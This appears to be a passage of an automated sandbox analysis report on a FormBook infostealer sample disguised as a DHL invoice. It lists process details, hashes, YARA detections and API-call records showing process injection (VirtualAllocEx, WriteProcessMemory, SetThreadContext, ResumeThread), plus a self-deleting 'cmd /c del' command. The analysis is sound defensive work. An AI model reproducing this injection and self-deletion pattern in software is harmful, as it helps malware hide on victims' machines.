Start date:	21/02/2024
Path:	C:\Windows\SysWOW64\systray.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\systray.exe
Imagebase:	0xb0000
File size:	9'728 bytes
MD5 hash:	28D565BB24D30E5E3DE8AFF6900AF098
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.3884970564.0000000004A20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3884970564.0000000004A20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3884970564.0000000004A20000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.3884970564.0000000004A20000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.3884970564.0000000004A20000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.3884563234.0000000002F70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3884563234.0000000002F70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3884563234.0000000002F70000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.3884563234.0000000002F70000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.3884563234.0000000002F70000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.3884191751.0000000002D00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3884191751.0000000002D00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3884191751.0000000002D00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.3884191751.0000000002D00000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.3884191751.0000000002D00000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	14:34:19
Start date:	21/02/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe"
Imagebase:	0xa40000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	14:34:19
Start date:	21/02/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	11.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	266
Total number of Limit Nodes:	24

Executed Functions

Function 06C58018 Relevance: 1.0, Instructions: 1026COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1474139046.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83f0526f5f6d8857c34d6a55fb1f771df8633064b0e99777c969c645e896f19e
Instruction ID: f2440dc9b56d2245740974871262720b4f8433dce25d90897a66f3bb4124bf11
Opcode Fuzzy Hash: 83f0526f5f6d8857c34d6a55fb1f771df8633064b0e99777c969c645e896f19e
Instruction Fuzzy Hash: 23B2C075E01228CFDB64CF69C984AD9BBB2FF89304F1581E9D509AB225DB319E81CF40

Uniqueness

Uniqueness Score: -1.00%

Function 06C5C5A0 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1474139046.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d853fec64b751ede945f7694b97dee6e25813f12086297a0f64b574261604a7
Instruction ID: 4a9ae638a095644f349ab5b5b7c8d35c62387b70a2dd16b8c4a09a0e37934f3f
Opcode Fuzzy Hash: 4d853fec64b751ede945f7694b97dee6e25813f12086297a0f64b574261604a7
Instruction Fuzzy Hash: 5F61C874D09318CFEB54CFA6C8406FDBBB6BF89340F11A429D819AB255DB345A85CF84

Uniqueness

Uniqueness Score: -1.00%

Function 06C57D30 Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1474139046.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb90a192eefd7d328e803a0d023ddb4a11b3baa0c1a77402f3ab91ff9779c991
Instruction ID: 98aa46dfb531d5a7392c89a0e5fd855dc892254197c1117fa963dbcd087a3a2e
Opcode Fuzzy Hash: bb90a192eefd7d328e803a0d023ddb4a11b3baa0c1a77402f3ab91ff9779c991
Instruction Fuzzy Hash: 6D612B70E042099FEB08EFBAF85169E7BF2FBC8700F14C569E0089B259EF7519069B51

Uniqueness

Uniqueness Score: -1.00%

Function 00C2D380 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00C2D3FE
GetCurrentThread.KERNEL32 ref: 00C2D43B
GetCurrentProcess.KERNEL32 ref: 00C2D478
GetCurrentThreadId.KERNEL32 ref: 00C2D4D1

Memory Dump Source

Source File: 00000000.00000002.1465799598.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 47ff71e1ebb9689675a1af342a7ebec9732976e0d8964028fa549bd1f4082af9
Instruction ID: 769225446cd5c917538578ce5059d8374b99af9ff56c4556841b17085c3072b2
Opcode Fuzzy Hash: 47ff71e1ebb9689675a1af342a7ebec9732976e0d8964028fa549bd1f4082af9
Instruction Fuzzy Hash: 735176B09003498FEB14DFAAD548BEEBBF1BF88304F208459E41AA7360D7746944CF65

Uniqueness

Uniqueness Score: -1.00%

Function 07001C54 Relevance: 1.7, APIs: 1, Instructions: 245
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 07001E96

Memory Dump Source

Source File: 00000000.00000002.1474870228.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7000000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 5e2bd28be5b0ca4fff0c7fd445a78649a2dbaab9dd917a3cef90065417583538
Instruction ID: 41fdd7b666faf5db5c34fc5793bba8b532b9f68b8993c2518594a82ac7ce8ebc
Opcode Fuzzy Hash: 5e2bd28be5b0ca4fff0c7fd445a78649a2dbaab9dd917a3cef90065417583538
Instruction Fuzzy Hash: 01A13AB1D0021DCFEB24DF68C8417EDBBF2BF49314F14866AE819A7280DB759985CB91

Uniqueness

Uniqueness Score: -1.00%

Function 07001C60 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 07001E96

Memory Dump Source

Source File: 00000000.00000002.1474870228.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7000000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: fbc0e0e78924c055f442e9266fbb99567109cf5bd012400c1b739fe107d3d745
Instruction ID: dde76deecab862b081c34d4ccdda1952d3cf47adcc1e6355a6ce1f04cc18bcae
Opcode Fuzzy Hash: fbc0e0e78924c055f442e9266fbb99567109cf5bd012400c1b739fe107d3d745
Instruction Fuzzy Hash: A9912AB1D0021DDFEB24DF68C8417EEBBF2AF45310F14866AE819A7280DB749985CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00C2B0F0 Relevance: 1.7, APIs: 1, Instructions: 197
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 00C2B346

Memory Dump Source

Source File: 00000000.00000002.1465799598.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 2599fbbd880e200530d0e7f8e52e10f4fa07054b022f3b4b26d9f1d00ebd9714
Instruction ID: 8399f17db09f2c88a19dcd024cdd1bd8cded16259ed85399c65924f9ac5d97ad
Opcode Fuzzy Hash: 2599fbbd880e200530d0e7f8e52e10f4fa07054b022f3b4b26d9f1d00ebd9714
Instruction Fuzzy Hash: 7A717670A00B158FDB24DF2AE4517AABBF1FF88700F00892ED49AD7A50DB74E945CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00C25CEC Relevance: 1.6, APIs: 1, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00C25DA9

Memory Dump Source

Source File: 00000000.00000002.1465799598.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 1f8760f17c5aef7df2513e503de658481e8bbe9ded8bd9ef61412dab8baad0bd
Instruction ID: 063ba23905c5b9384bab18a6c924ad5eb3d9a3c949b26c07074c270d1f6813a8
Opcode Fuzzy Hash: 1f8760f17c5aef7df2513e503de658481e8bbe9ded8bd9ef61412dab8baad0bd
Instruction Fuzzy Hash: 5741D0B1C00729CFEB25CFA9D844BCEBBB5BF89704F20806AD419AB251DB755946CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00C23E44 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00C25DA9

Memory Dump Source

Source File: 00000000.00000002.1465799598.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: eca6917dbe637182c6043512e7fd6ee3c20d332b7258ab8b30bb67da5f5b685d
Instruction ID: 51a4710d5c7e544816a4af8f3a9cdfebf2d80022e4bf2ed7c135611ae4a7c6c4
Opcode Fuzzy Hash: eca6917dbe637182c6043512e7fd6ee3c20d332b7258ab8b30bb67da5f5b685d
Instruction Fuzzy Hash: 2541B2B0C00719CBDB24DFA9D8447DEBBF5BF48704F20806AD419AB255DB756946CF90

Uniqueness

Uniqueness Score: -1.00%

Function 07001400 Relevance: 1.6, APIs: 1, Instructions: 71
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07001486

Memory Dump Source

Source File: 00000000.00000002.1474870228.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7000000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: a14edeb3bdb902735ae53ab29b2f65d5d4b788d9f4ff9f01dd1d364b042bed0d
Instruction ID: 55594c6f0c08d713e86e604fbf99cc967013c5d98b2241d09bc2d60f93c1b3b1
Opcode Fuzzy Hash: a14edeb3bdb902735ae53ab29b2f65d5d4b788d9f4ff9f01dd1d364b042bed0d
Instruction Fuzzy Hash: 042159B6D003098FEB10CFAAC4817EEBBF4EF48325F10842AE419A7280D7789545CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 070019D0 Relevance: 1.6, APIs: 1, Instructions: 70
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 07001A68

Memory Dump Source

Source File: 00000000.00000002.1474870228.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7000000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 895425b196d94a7aeaa1fd45e2a16fd9848202231f76a2522d43bbc2d92420fa
Instruction ID: eaa62dfc016966f7bf68ddf8a4b37bf35828a509acfbd021dbf176830d32f774
Opcode Fuzzy Hash: 895425b196d94a7aeaa1fd45e2a16fd9848202231f76a2522d43bbc2d92420fa
Instruction Fuzzy Hash: DA2128B6900319DFDB10CFA9C9817DEBBF5FF48310F10882AE559A7240D7789955CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 070019D8 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 07001A68

Memory Dump Source

Source File: 00000000.00000002.1474870228.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7000000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: fb444a52eaee774d0191414f2e61b69ce3c235a0e18a1a75d31a1632fed73d00
Instruction ID: 55ee29d0d259417fda27a3d18dd28eb314213f77b2277a6e36426ea63e890617
Opcode Fuzzy Hash: fb444a52eaee774d0191414f2e61b69ce3c235a0e18a1a75d31a1632fed73d00
Instruction Fuzzy Hash: F62127B290030D9FDB10CFAAC881BDEBBF5FF48310F10842AE919A7240D7789951CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 07001AC0 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 07001B48

Memory Dump Source

Source File: 00000000.00000002.1474870228.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7000000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: dca3899fb028c822a14a9fc6337a1355e097449a665ca2a9598fe4d52c8c43ff
Instruction ID: c367add00c9553f8ace01cfd3b31de49e2e3d16e8b8aaeb6488f23621ea57d6d
Opcode Fuzzy Hash: dca3899fb028c822a14a9fc6337a1355e097449a665ca2a9598fe4d52c8c43ff
Instruction Fuzzy Hash: A02116B18003199FDB10CFAAC981BDEFBF5FF48310F10882AE559A7240D7399545DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 07001AC8 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 07001B48

Memory Dump Source

Source File: 00000000.00000002.1474870228.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7000000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 9e0ef2f3c592d58d508b906a4f8090b2d0bd662856aaff7aa8e14ce6b92d18f4
Instruction ID: c905e7cdeb0bc66c6d26b8b3d69d76b733bf2cda122ae81aed443c962127becc
Opcode Fuzzy Hash: 9e0ef2f3c592d58d508b906a4f8090b2d0bd662856aaff7aa8e14ce6b92d18f4
Instruction Fuzzy Hash: E12128B18003499FDB10CFAAC881BDEFBF5FF48320F10842AE519A7240D7799501CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 07001408 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07001486

Memory Dump Source

Source File: 00000000.00000002.1474870228.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7000000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 3f733b76e4fdb1a4adb6861d5c7a65b9b7a136bace3855b82996d30df9415a61
Instruction ID: 868bacd4b1a17116305c4826f443379f26376ece114d2b067b7a36cadcb5fd1b
Opcode Fuzzy Hash: 3f733b76e4fdb1a4adb6861d5c7a65b9b7a136bace3855b82996d30df9415a61
Instruction Fuzzy Hash: 362129B1D003099FDB10DFAAC4857EEBBF4EF48324F14842AD459A7240DB789945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00C2D5C8 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00C2D64F

Memory Dump Source

Source File: 00000000.00000002.1465799598.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 2202868416ee1d91f299822aef154b4bbd4a58d46dccbf23308a941b561b4fd9
Instruction ID: d1d6055b95517e8fbdce835764dceecce9540a049f9d35ae9925b8f0c2971792
Opcode Fuzzy Hash: 2202868416ee1d91f299822aef154b4bbd4a58d46dccbf23308a941b561b4fd9
Instruction Fuzzy Hash: F121C2B59002589FDB10CFAAD984ADEFBF8EB48710F14841AE919A3350D378A954CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00C2ADB8 Relevance: 1.6, APIs: 1, Instructions: 55
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00C2B3C1,00000800,00000000,00000000), ref: 00C2B5D2

Memory Dump Source

Source File: 00000000.00000002.1465799598.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 15dbb87e18eb34066ce0507539ac13d81a7f301d32d7e1bbb9d6057345d0d850
Instruction ID: ae559c82d216d16a280804a2006211ea58cd2e70082275f6a21b23c5eac3518c
Opcode Fuzzy Hash: 15dbb87e18eb34066ce0507539ac13d81a7f301d32d7e1bbb9d6057345d0d850
Instruction Fuzzy Hash: EB1126B6D043098FDB10CF9AD444BDEFBF8EB88710F14842AE529A7600C375A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00C2B560 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00C2B3C1,00000800,00000000,00000000), ref: 00C2B5D2

Memory Dump Source

Source File: 00000000.00000002.1465799598.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 6cec5e46e4327f913f974141496aa80d9719aa3f1f00d4120f8605c4d2e3a95e
Instruction ID: ee26424541051d14caa78b64a39f525ea11712ca373e35379c8e76d946881c3b
Opcode Fuzzy Hash: 6cec5e46e4327f913f974141496aa80d9719aa3f1f00d4120f8605c4d2e3a95e
Instruction Fuzzy Hash: A71117B6C003499FDB10CFAAD444ADEFBF4AF48710F14842AE419A7600C375A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 07001910 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 07001986

Memory Dump Source

Source File: 00000000.00000002.1474870228.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7000000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b4586304accab39576d1cbf31e58ec8e7db71cd4b08ff64f8b55e38d307b6f05
Instruction ID: 232d0e85a97664a43bb892be1b226c734f90f438802cce4377341d7bc61adb75
Opcode Fuzzy Hash: b4586304accab39576d1cbf31e58ec8e7db71cd4b08ff64f8b55e38d307b6f05
Instruction Fuzzy Hash: 831126B6900209DFDB10DFAAC8457DEBBF5AF48320F24881AE569A7250C775A945CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 07001918 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 07001986

Memory Dump Source

Source File: 00000000.00000002.1474870228.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7000000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: afa5b3c2ebdbdd9376467d1c865e385f56bca716fbf4d03d4397f2b46b63a54d
Instruction ID: 450d512459a1f0dc9a87a43bfd65f63121346f39a4e17d988e0e3d06d1733537
Opcode Fuzzy Hash: afa5b3c2ebdbdd9376467d1c865e385f56bca716fbf4d03d4397f2b46b63a54d
Instruction Fuzzy Hash: AF1126728003499FDB10DFAAC845BDFBBF5AF48320F14881AE529A7250C775A940CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 07001358 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 070013BA

Memory Dump Source

Source File: 00000000.00000002.1474870228.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7000000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 8f0ff2041f58091b4045ae7bb77fd1c45a16a76b9e12c6919217d202d48c790e
Instruction ID: 67d3657622457fe8c432da69e4547e4c31190723c07aa92f254e8d6a4d0e92b9
Opcode Fuzzy Hash: 8f0ff2041f58091b4045ae7bb77fd1c45a16a76b9e12c6919217d202d48c790e
Instruction Fuzzy Hash: 4E1128B19003498BDB24DFAAD44579EFBF4AB88624F24881AD529A7640C7756540CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 07002B20 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0700487D

Memory Dump Source

Source File: 00000000.00000002.1474870228.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7000000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: be5850188668d99eaf8fdced2798e5dc37f0cc4c82f3bc96497b21a02d44598e
Instruction ID: 479fab289383d22ee86fa0dab711690ca56708161a37347954afab62b61b09ff
Opcode Fuzzy Hash: be5850188668d99eaf8fdced2798e5dc37f0cc4c82f3bc96497b21a02d44598e
Instruction Fuzzy Hash: 871106B5800389DFDB10DF9AD545BDEFBF8EB49320F108859EA19A7240C375A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00C2B2E0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 00C2B346

Memory Dump Source

Source File: 00000000.00000002.1465799598.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: d04245db39c9a05b47b7be90e2fe9029facbe914b3968c700ce079ed33ccc447
Instruction ID: 047221c62aa59592d7e3439f1b65df069dfe93fa918f100aaef54fc7543bc4e8
Opcode Fuzzy Hash: d04245db39c9a05b47b7be90e2fe9029facbe914b3968c700ce079ed33ccc447
Instruction Fuzzy Hash: BE1110B6C007498FCB10CF9AD444BDEFBF4AF88314F10841AD429A7610C375A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0700481B Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0700487D

Memory Dump Source

Source File: 00000000.00000002.1474870228.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7000000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 6fc3f9c9d137892b8c3012ed6e8b04a88afa68a77e54c73dd58d25da6243e558
Instruction ID: 270d6521facb601961909b852ed0db91abbef34737261a23452959f66dd58d19
Opcode Fuzzy Hash: 6fc3f9c9d137892b8c3012ed6e8b04a88afa68a77e54c73dd58d25da6243e558
Instruction Fuzzy Hash: FD11FEB58003498FDB10CF9AC585BDEBBF4EB08320F20881AE918A7240C375A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06C57378 Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1474139046.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c28014d84d834bd74c6ecd7f8aefdc1ba58cc2cfc96c01ca7a0d34a2c198a228
Instruction ID: 84aff1b753c9f2b9bcedc1431f64d5c9bdbeb401916bcfe61f18867e0ad28030
Opcode Fuzzy Hash: c28014d84d834bd74c6ecd7f8aefdc1ba58cc2cfc96c01ca7a0d34a2c198a228
Instruction Fuzzy Hash: FC715174D14218CFDB40DFA9D884AEDBBB5FF08310F41A459E808A7355D7709989CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 06C57BA0 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1474139046.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

